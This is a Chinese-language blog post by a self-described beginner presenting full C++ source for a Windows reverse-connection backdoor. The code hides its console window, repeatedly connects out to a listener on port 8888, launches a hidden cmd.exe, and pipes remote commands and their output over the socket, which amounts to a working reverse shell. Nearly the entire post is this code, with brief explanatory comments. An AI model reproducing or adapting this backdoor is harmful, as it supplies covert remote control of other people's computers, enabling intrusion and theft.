这几天学习了一下windows后门编程,并尝试着写了一个简单的cmd双管道后门。主要涉及到了socket通信和管道。
后门分为主动连接型和反向连接型,区别就是一个是后门程序作为服务端,另一个是后门程序作为客户端。
双管道的原因:cmd执行结果写入管道1写句柄,后门从管道1读句柄读取cmd执行结果,后门接受到的命令通过管道2的写句柄写入,cmd通过管道2的读句柄读出。
多的不说,直接上代码,我觉得注释还是比较详细了
#include<iostream>
#include<stdio.h>
#include<stdlib.h>
#include<string.h>
#include<winsock.h>
#include<Windows.h>
#pragma comment(lib,"ws2_32.lib")
SOCKET Connecting(unsigned short Port);
void CmdLine(SOCKET s);
int Hide();
int main() {
Hide();
SOCKET s;
s = Connecting(8888);
CmdLine(s);
closesocket(s);
WSACleanup();
return 0;
}
SOCKET Connecting(unsigned short Port) {
WSADATA wsa;
if (WSAStartup(MAKEWORD(2, 2), &wsa) != 0)
return SOCKET_ERROR;
//创建套接字
SOCKET s = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
if (s == INVALID_SOCKET)
return SOCKET_ERROR;
//对sockaddr_in结构体填充地址,端口等信息
struct sockaddr_in ServerAddr;
ServerAddr.sin_family = AF_INET;
ServerAddr.sin_addr.S_un.S_addr = inet_addr("127.0.0.1");
ServerAddr.sin_port = htons(Port);
//连接服务器
while (connect(s, (SOCKADDR *)&ServerAddr, sizeof(ServerAddr)));
return s;
}
void CmdLine(SOCKET s) {
//双管道读写句柄
HANDLE hReadPipe1, hWritePipe1, hReadPipe2, hWritePipe2;
//对SECURITY_ATTRIBUTES结构体进行填充
SECURITY_ATTRIBUTES se;
se.nLength = 12;
se.lpSecurityDescriptor = 0;
se.bInheritHandle = true;
//创建管道
CreatePipe(&hReadPipe1, &hWritePipe1, &se, 0); //管道1
CreatePipe(&hReadPipe2, &hWritePipe2, &se, 0); //管道2
//指定cmd的启动信息
STARTUPINFO si;
ZeroMemory(&si, sizeof(si));
si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
si.wShowWindow = SW_HIDE;
si.hStdInput = hReadPipe2;
si.hStdOutput = si.hStdError = hWritePipe1;
PROCESS_INFORMATION Pro;
//创建进程
char cmdline[] = "cmd.exe";
CreateProcess(NULL,cmdline, NULL, NULL, 1, 0, NULL, NULL, &si, &Pro);
while (1)
{
unsigned long lBytesRead;
char Buff[1024];
//查看cmd是否有输出
PeekNamedPipe(hReadPipe1, Buff, 1024, &lBytesRead, 0, 0);
if (lBytesRead)
{
//读取cmd的输出,发送到客户端
ReadFile(hReadPipe1, Buff, lBytesRead, &lBytesRead, 0);
send(s, Buff, lBytesRead, 0);
}
else
{
//接收客户端命令
lBytesRead = recv(s, Buff, 1024, 0);
//把命令传给cmd
WriteFile(hWritePipe2, Buff, lBytesRead, &lBytesRead, 0);
}
}
}
int Hide() {
HWND hwnd;
hwnd = FindWindow("ConsoleWindowClass", NULL); //处理顶级窗口的类名和窗口名称匹配指定的字符串,不搜索子窗口。
if (hwnd)
{
ShowWindow(hwnd, SW_HIDE); //设置指定窗口的显示状态
}
return 0;
}
运行效果:
第一次写,代码很简陋,也存在很多问题,大佬们看看就好了,望轻喷,随着以后的学习,我也会继续改进的。